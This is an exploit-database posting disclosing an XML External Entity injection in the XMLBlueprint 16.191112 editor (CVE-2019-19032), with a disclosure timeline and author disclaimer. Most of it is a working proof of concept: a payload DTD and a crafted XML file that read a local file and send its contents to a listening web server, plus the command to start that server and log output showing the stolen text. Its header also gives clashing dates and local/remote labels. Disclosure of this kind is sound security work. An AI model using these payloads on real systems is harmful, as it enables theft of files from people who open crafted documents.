XMLBlueprint 16.191112 XML Injection

2020.01.30
Credit: Javier Olmedo
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection # Exploit Author: Javier Olmedo # Date: 2018-11-14 # Vendor: XMLBlueprint XML Editor # Software Link: https://www.xmlblueprint.com/update/download-64bit.exe # Affected Version: 16.191112 and before # Patched Version: unpatched # Category: Local # Platform: XML # Tested on: Windows 10 Pro # CWE: https://cwe.mitre.org/data/definitions/611.html # CVE: 2019-19032 # References: # https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/ # 1. Technical Description # XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity # Injection vulnerability through the malicious XML file. This allows a malicious user # to read arbitrary files. # 2. Proof Of Concept (PoC) # 2.1 Start a webserver to receive the connection. python -m SimpleHTTPServer 80 # 2.2 Upload the payload.dtd file to your web server. <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>"> %all; # 2.3 Create a secret.txt file with any content in desktop. # 2.4 Open poc.xml and click XML -> Validate <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt"> <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd"> %dtd;]> <pwn>&send;</pwn> # 2.5 Your web server will receive a request with the contents of the secret.txt file Serving HTTP on 0.0.0.0 port 8000 ... 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 - 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 - # 3. Timeline # 13, november 2019 - [RESEARCHER] Discover # 13, november 2019 - [RESEARCHER] Report to vendor support # 14, november 2019 - [DEVELOPER] Unrecognized vulnerability # 15, november 2019 - [RESEARCHER] Detailed vulnerability report # 22, november 2019 - [RESEARCHER] Public disclosure # 4. Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top